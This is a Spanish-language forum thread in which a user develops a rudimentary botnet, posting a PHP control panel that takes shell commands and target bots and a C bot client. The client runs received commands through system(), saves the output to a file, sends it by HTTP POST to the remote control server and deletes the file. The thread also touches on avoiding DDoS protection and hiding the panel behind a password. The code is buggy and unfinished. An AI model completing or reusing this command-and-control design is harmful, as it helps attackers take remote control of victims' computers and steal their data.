Vamos a ver, el código creo que no está mal, si no funciona por un fallo me daría una alegría, si lo es por limitaciones del servidor es otra historia.

Haber en el bot.php tengo el siguiente script:

<?
$comando = $_GET['com'];
$bot = $_GET['bot'];
$port=5748;
 
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die("Could not create socket\n");
$result = socket_connect($socket, $bot, $port) or die("Could not connect toserver\n");
socket_write($socket, $comando, strlen($message)) or die("Could not send data to server\n");
socket_close($socket);
}
?>
 

Esto lo que hace es que cuando yo pulse ok, y envíe las variables $comando y $bot, el script se ejecuta y se mandan los datos a los servidores C.

Servidor C:

 
#define IP "ip del server"
#define PUERTO 5748
 
int main()
{
    WSADATA wsa;
    int fd, fd2;
    struct sockaddr_in server;
    struct sockaddr_in client;
    int sn_size;
    char buf[60];
 
    WSAStartup(MAKEWORD(2,0),&wsa);
 
    if ((fd=socket(AF_INET, SOCK_STREAM, 0))==1)
    {
        printf ("Error en socketn" );
        exit(-1);
    }
 
    server.sin_family = AF_INET;
    server.sin_port=htons(PUERTO);
    server.sin_addr.s_addr=INADDR_ANY;
    //bzero(&(server.sin_zero),8);
    if (bind(fd,(struct sockaddr *) &server, sizeof(struct sockaddr))== -1)
    {
        printf("Error en bindn" );
        exit(-1);
    }
 
    if (listen(fd, 1) == -1)
    {
        printf("Error en listenn" );
        exit(-1);
    }
 
    printf("entro while ok");
    while (1)
    {
        sn_size = sizeof(struct sockaddr_in);
 
        if ((fd2=accept(fd,(struct sockaddr *)&client, &sn_size)) == -1)
        {
            printf ("error en accept n" );
            exit(-1);
        }
        recv(fd,buf,50,1);
        printf("Comando recibido: %s",buf);
        printf("Se conectaron desde %s\n", inet_ntoa(client.sin_addr));
        close(fd2);
    }
    return 0;
}
 

Buendo gente esto es todo, lo que pasa ahora es que al ejecutar el script no me llegan datos al servidor, no muestra el mensaje recibido, espero que vosotros sepáis a que se debe ya estoy cerca.

Edito: OMG no me deja acceder a la página web, no me carga, he accedido con un proxy y va sin problemas, ¿que cojones?

Edito: Después de todo, el **** hosting al parecer no me deja correr el script,
cuando detecta que inicias comunicación una máquina con sockets deniega el acceso a esa ip, una media hora o más... 2 veces he probado corriendo el servidor en mi ordenador las 2 al pasar 1 minuto no podía acceder a la página con mi ip, si con proxy y demás... Luego si ese código no funciona habrá que hacer la botnet pasiva, pues ya vemos que el servidor web, no es capaz de correr un cliente php...
El socket del cliente php se creo, se creo la conexion y no supe ya más, no me deja entrar en la página 


Salu2.

Vaya, es que creo que había algo para autentificarse en plan:

POST /directorio_protegido/archivito.php HTTP/1.1\r\n
user: blabla\r\n
pass: blabla\r\n
Host: webdomain.com\r\n
Content-type: application/x-www-form-urlencoded\r\n
Content-length: 40\r\n\r\n
n=wdj2ij
 

Y he buscado pero no encuentro nada, pensé que igual os ha pasado alguna vez y sabríais del tema xD,es algo bastante importante (ya que es necesario mandar POST al php del directorio protegido, porque en ese PHP es donde quiero controlar la botnet y si ese PHP no está protegido cualquiera podría acceder a él), pero a la vez si pongo el usuario y password en la cabecera cualquiera podría snifar el tráfico y hacerse con la botnet, luego habría que buscar otro camino para proteger el PHP.

Saludos.

Pues eso, tengo un directorio protegido en mi página y debo hacer un POST sobre un archivo php de dentro del directorio protegido, la cabecera que uso es la siguiente, faltaría la autentificación (uso htaccess y htpasswd):

 
POST /directorio_protegido/archivito.php HTTP/1.1\r\n");
Host: webdomain.com\r\n");
Content-type: application/x-www-form-urlencoded\r\n");
Content-length: 40\r\n\r\n);
n=wdj2ij
 

Como conseguiría que funcionara para que funcionase sobre un archivo protegido?

Ya veo, tu botnet al parecer era pasiva, los bot mandaban un POST y en función de su estado se les asignaba una tarea, pero sin embargo tiene una cosa que me interesa, háblame acerca del echo, ¿es necesario para enviar la "tarea al bot" (que sería la cadena al cliente que llevo buscando dónde iría el comando) estar trabajando con una base de datos? De no ser así, me gustaría como capta la orden el cliente que se inicia a partir del echo.

PD: No tengo idea de base de datos podría ponerme también a ello, pero paso de sacarme la carrera en una semana que a este ritmo XDD

Gracias y saludos.

Edito: Estoy con ello jajaja, acabo de probar un cliente en el servidor, a ese cliente le paso las ips del archivo y va mandando los comandos uno a uno jajaja, me parto he dado a enviar comando con el server c abierto y se ha quedado cargando la página en plan adiós jajaja

Gracias Vaagish, me podrías explicar ¿como funciona tu código? Mi interpretación es que el cliente manda un POST y el PHP en función a lo que le manda trabaja sobre bases de datos (cosas que no he dado). No entiendo para que funciona. Yo solo busco algo tan simple y complejo como enviar una cadena desde un servidor PHP a un cliente C. Pero no entiendo, si el server manda una cadena al cliente, en este caso el server sería el cliente, un lío.

Código de un server PHP:

http://www.codeproject.com/Tips/418814/Socket-Programming-in-PHP

<?
$host = "127.0.0.1";
$port = 5353;
// No Timeout 
set_time_limit(0);
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die("Could not create socket\n");
$result = socket_bind($socket, $host, $port) or die("Could not bind to socket\n");
$result = socket_listen($socket, 3) or die("Could not set up socket listener\n");
$spawn = socket_accept($socket) or die("Could not accept incoming connection\n");
//abajo lee el mensaje del cliente.
$input = socket_read($spawn, 1024) or die("Could not read input\n");
//abajo invierte la cadena recibida y la manda al cliente BIEN SABEMOS MANDAR ALGO 
//AL CLIENTE!
$output = strrev($input) . "\n";
socket_write($spawn, $output, strlen ($output)) or die("Could not write output\n"); 
socket_close($spawn);
socket_close($socket);
?>
 

Ahora observo el ejemplo de cliente que usa la página, está en PHP pero trataré de pasarlo a C aquí abajo:

/*headers...*/
#define IP 80.234.23.123
#define PUERTO 80
int main()
{
WSADATA wsa;
    int sok,len,i=0;
char *buf="holaa",baf[100];
    struct sockaddr_in dir;
WSAStartup(MAKEWORD(2,0),&wsa);
    if((sok=socket(AF_INET,SOCK_STREAM,0))==-1){}
    else{
        dir.sin_family=AF_INET;
        dir.sin_port=htons(PUERTO);
        dir.sin_addr.s_addr=inet_addr(IP);
connect(sok,(struct sockaddr*)&dir,sizeof(dir));
write(sok,buf,strlen(buf));
recv(sok,baf,strlen(baf));
closesocket(sock);
return 0;
}
 

Gente creo que me ha quedado bastante bien el cliente y el server que era lo que buscaba, ahora a probarlo que esa es otra, pero no esta mal traduciendolo de PHP a C he aprendido bastantes cosas, si me dejo algo decidme, seguire trabajando.

Edito: El server web debería solo de poder escuchar peticiones en el puerto 80, pues supongo que no se le podrán abrir otros puertos al ser servidor gratuito, pero ese es el mismo puerto para http, funcionaría? no sé

Edito: Como va a funcionar si no estoy indicando el php con el que quiero trabajar... haber.

Saludos

Si usa sockets los usa para enviar el comando desde el servidor hasta los bots clientes.
Como dije, este comando se enviaría a todos los usuarios conectados que estarían en el archivo, si falla uno (se desconecta después de refrescarse)  fallaría la conexión y se cancelaría el comando para ese usuario no habría problema.

Ahora bien faltaría necesitaría ayuda pues no sé como funciona del todo el código PHP que posteé creo que hace lo que dije, ahora tengo que crear en el cliente/bot un socket que se encargue de recoger ese comando y eso no lo sé hacer, haber si alguien me echa un cable porque nunca he trabajado con sockets xD, se hacer POST y nada más.

Creo con esto que la idea está clara, sería una botnet para un reducido número de bots, y es ás en un caso de que sean muy pocos (menos de 20) no haría falta crear el online.txt ni refrescarlo, podríamos hacer un for e ir recorriendolos uno a uno: que está conectado? le mandamos comando, que no? socket falla cancelamos comando. Si son pocos esto sería viable.

Saludos

Entonces el "REQUEST" es como un ping que le dice al servidor estoy listo para recibir ordenes, y debe de hacerse constantemente, para que cuando mande el comando desde el server el bot sea capaz de recibirlo, pero no entiendo hago esto y que consigo, que me faltaría.

He buscado como hacer HTTP REQUEST con C y he encontrado esto (habría que pasarlo a windows):

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
 
/*
 * 
 */
int main(int argc, char** argv) {
 
    char arg[500];
    char firstHalf[500];
    char secondHalf[500];
    char request[1000];
    struct hostent *server;
    struct sockaddr_in serveraddr;
    int port = 80;
 
    strcpy(arg, argv[1]);
 
    int i;
    for (i = 0; i < strlen(arg); i++)
    {
        if (arg[i] == '/')
        {
                strncpy(firstHalf, arg, i);
                firstHalf[i] = '\0';
                break;
        }     
    }
 
    for (i; i < strlen(arg); i++)
    {
        strcat(secondHalf, &arg[i]);
        break;
    }
 
    printf("\nFirst Half: %s", firstHalf);
 
    printf("\nSecond Half: %s", secondHalf);
 
    int tcpSocket = socket(AF_INET, SOCK_STREAM, 0);
 
    if (tcpSocket < 0)
        printf("\nError opening socket");
    else
        printf("\nSuccessfully opened socket");
 
    server = gethostbyname(firstHalf);
 
    if (server == NULL)
    {
        printf("gethostbyname() failed\n");
    }
    else
    {
        printf("\n%s = ", server->h_name);
        unsigned int j = 0;
        while (server -> h_addr_list[j] != NULL)
        {
            printf("%s", inet_ntoa(*(struct in_addr*)(server -> h_addr_list[j])));
            j++;
        }
    }
 
    printf("\n");
 
    bzero((char *) &serveraddr, sizeof(serveraddr));
    serveraddr.sin_family = AF_INET;
 
    bcopy((char *)server->h_addr, (char *)&serveraddr.sin_addr.s_addr, server->h_length);
 
    serveraddr.sin_port = htons(port);
 
    if (connect(tcpSocket, (struct sockaddr *) &serveraddr, sizeof(serveraddr)) < 0)
        printf("\nError Connecting");
    else
        printf("\nSuccessfully Connected");
 
    bzero(request, 1000);
 
    sprintf(request, "Get %s HTTP/1.1\r\n Host: %s\r\n \r\n \r\n", secondHalf, firstHalf);
 
    printf("\n%s", request);
 
    if (send(tcpSocket, request, strlen(request), 0) < 0)
        printf("Error with send()");
    else
        printf("Successfully sent html fetch request");
 
    bzero(request, 1000);
 
    recv(tcpSocket, request, 999, 0);
    printf("\n%s", request);
    printf("\nhello");
 
    close(tcpSocket);
 
    return (EXIT_SUCCESS);
}

Esto es en teoría un HTTP REQUEST, que no se lo que es aún, ¿dónde recogería, en que variable el comando del server?, perdonad mi ignorancia porque nunca he trabajado con algo parecido y me parece muy complejo, lo veo todo borroso.

Podría hacer una función en mi bot que haga un HTTP REQUEST, pero, ¿cuando debería usarla y por qué?

Edito: Lo borro todo, eso de request es demasiado complejo y molesto, mi idea es que los bots hagan un POST al server y este guarde su dirección IP en un archivo, este archivo se borra cada cierto tiempo, bien tenemos las ips en el archivo, continuamos...
Ahora usamos esto:

<?php
error_reporting(E_ALL);
 
/* Permitir al script esperar para conexiones. */
set_time_limit(0);
 
/* Activar el volcado de salida implícito, así veremos lo que estamo obteniendo
 * mientras llega. */
ob_implicit_flush();
 
$address = '192.168.1.53';
$port = 10000;
 
if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) === false) {
    echo "socket_create() falló: razón: " . socket_strerror(socket_last_error()) . "\n";
}
 
if (socket_bind($sock, $address, $port) === false) {
    echo "socket_bind() falló: razón: " . socket_strerror(socket_last_error($sock)) . "\n";
}
 
if (socket_listen($sock, 5) === false) {
    echo "socket_listen() falló: razón: " . socket_strerror(socket_last_error($sock)) . "\n";
}
 
do {
    if (($msgsock = socket_accept($sock)) === false) {
        echo "socket_accept() falló: razón: " . socket_strerror(socket_last_error($sock)) . "\n";
        break;
    }
    /* Enviar instrucciones. */
    $msg = "\nBienvenido al Servidor De Prueba de PHP. \n" .
        "Para salir, escriba 'quit'. Para cerrar el servidor escriba 'shutdown'.\n";
    socket_write($msgsock, $msg, strlen($msg));
 
    do {
        if (false === ($buf = socket_read($msgsock, 2048, PHP_NORMAL_READ))) {
            echo "socket_read() falló: razón: " . socket_strerror(socket_last_error($msgsock)) . "\n";
            break 2;
        }
        if (!$buf = trim($buf)) {
            continue;
        }
        if ($buf == 'quit') {
            break;
        }
        if ($buf == 'shutdown') {
            socket_close($msgsock);
            break 2;
        }
        $talkback = "PHP: Usted dijo '$buf'.\n";
        socket_write($msgsock, $talkback, strlen($talkback));
        echo "$buf\n";
    } while (true);
    socket_close($msgsock);
} while (true);
 
socket_close($sock);
?>

Esto enviaría una cadena al cliente bot, a través de su ip (la tenemos en el archivo) y un puerto (el que queramos), a través de esto enviamos el comando objetivo cumplido, o ¿me equivoco?

Edito: El server es evidente no podrá controlar más de unos 100 bots a la vez, pues estos para actualizar el "online.txt" deben mandar un POST cada minuto para indicar que están conectados y así el server poder enviar a través de su ip y puerto el comando con la orden.

Saludos y gracias por la paciencia xD

Tengo pensado hacer una chapucilla para saber los bots que están conectados, podría poner al bot que haga un GET cada 5 minutos a un php para saber si está conectado, el php lo guardríaa en un archivo "online.txt" que el propio php lo borraría cada 5 minutos por ejemplo para eliminar los bots que ya se fueron, asi pues el online.txt tendría algo como: "usuario:14241 online ..." también podría poner su ip, ahora vale con esto ya sabría quienes están conectados de una manera muy chapucera, pero como hago para enviar el comando desde el server con php hacia los bots, para que estos lo ejecuten, y como poder evadir ese ddos del que me hablas xD (eso ya en segundo plano).

Saludos

Gracias por tu respuesta engel, he estado trabajando hasta ahora en ello. He protegido directorios, he conseguido acceder a directorios externos al actual, estética de la web y demás blablas.

Lo que tengo es esto en el php que controlaría la botnet:
(He borrado los contenedores para ir al grano y que no se alargue el code).

<html> 
<head> 
<title>Mi botnet</title>
<form action="bot.php" method="GET" > 
<sub style="color: #000000">Comando a interpretar</sub>
<input type="Text" name="com" size="35" maxlength="100">
<sub style="color: #000000">Seleccione bot (si no todos serán objetivos)</sub>
<input type="Text" name="bot" size="8" maxlength="20">
<input type="Submit" value="ENVIAR">
</form>
<?
$comando = $_GET['com'];
$bot = $_GET['bot'];
if(strcmp($bot,"")==0)//mando comado a todos
{
 
}
else//busco y mando comando solo al indicado
{
 
}
//Aqui debería mandar la cadena de texto al cliente para que lo ejecute en la cmd y genere un archivo, que luego lo subiré
//con un POST su contenido, cargándolo en una variable y mostrándolo.
?>
</div>
</center>
</body> 
</html>
 

El PHP lo que hace es recoger 2 variables que son el comando a interpretar en la SHELL del cliente, y el cliente objetivo al que se desearía interpretar, si la variable está vacía se ejecutaría a todos. Lo que no sé es como mandar desde el servidor esas cadenas con el comando a los clientes que estarían conectados, esa es la clave. Tanto para enviarlo en el PHP como para recibirlo en el C.

En el lado del C tengo esto:

#define IP "48.123.321.123"
#define PUERTO 80
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <direct.h>
#include <conio.h>
#include <time.h>
#include <math.h>
 
int main()
{
    char cola[20]=">data.txt",comando[100];
    //recibiría el comando
    strcat(comando,cola);
    system(comando);
    conecta("data.txt");//sube la variable del usuario y contenido del archivo
    //(lo que devolvio la cmd) para cargar en vars en el PHP y mostrar allí
    return 0;
}
 
void conecta(char nombre[])
{
    FILE *dat;
    WSADATA wsa;
    int sok,len,i=0;
    struct sockaddr_in dir;
    char buf[60384],cad[60384],aux[10],borra[50]="del ",car;
    WSAStartup(MAKEWORD(2,0),&wsa);
    if((sok=socket(AF_INET,SOCK_STREAM,0))==-1){}
    else{
        dir.sin_family=AF_INET;
        dir.sin_port=htons(PUERTO);
        dir.sin_addr.s_addr=inet_addr(IP);
        strcat(cad,"n=");
        strcat(cad,nombre);
        strcat(cad,"&b=");
        dat=fopen(nombre,"rt");
        if(nombre==NULL)
        {
            exit(0);
        }
        while(car!=EOF)
        {
            i++;
            fseek(dat,-i,SEEK_END);
            car=fgetc(dat);
            cad[strlen(cad)]=car;
        }
        fclose(dat);
        len=strlen(cad);
        printf("%s",cad);
        itoa(len,aux,10);
        strcpy(buf,"POST direcotior_protegido/bot.php HTTP/1.1\r\n");
        strcat(buf,"Host: hostquesea.com\r\n");
        strcat(buf,"Content-type: application/x-www-form-urlencoded\r\n");
        strcat(buf,"Content-length: ");
        strcat(buf,aux);
        strcat(buf,"\r\n\r\n");
        strcat(buf,cad);
        connect(sok,(struct sockaddr*)&dir,sizeof(dir));
        send(sok,buf,strlen(buf),0);
        strcat(borra,nombre);
        system(borra);
    }
}
 
 

Esto sería ya sabéis me falta mantener una conexión constante entre cliente y server y poder mandar esos comandos desde el server.

OJO a lo de directorio protegido (donde se encuentra el bot.php), porque al estarlo probablemente no me deje hacer POST a esa dirección es por eso que me pregunto que había que poner en la cabecera del POST para autentificarse porque lo busco pero no lo encuentro quizá lo sabéis.

También he de decir engel que busco aprender no crear mi propia botnet pero si saber como hacerla pues me atrae, otra cosa sería dar el paso de ponerla en funcionamiento e infectar ordenadores se me podría caer el pelo y es algo a lo que no aspiro.

Saludos, a la espera de ayuda, seguiré subiendo code y actualizándolo.
Toda mejora o consejo es bienvenida.

Gracias por la respuesta, probé también con el archivo como dije con el cifrado en la pass y sin ella pero no iba, y creo que se debe a que queria proteger el la carpeta public_html, y esa no se puede proteger si no sus subdirectorios ahí si que me dejo, de todas formas encontré una manera de hacerlo automáticamente desde el hospedador y funcionó sin problemas, saludos y gracias.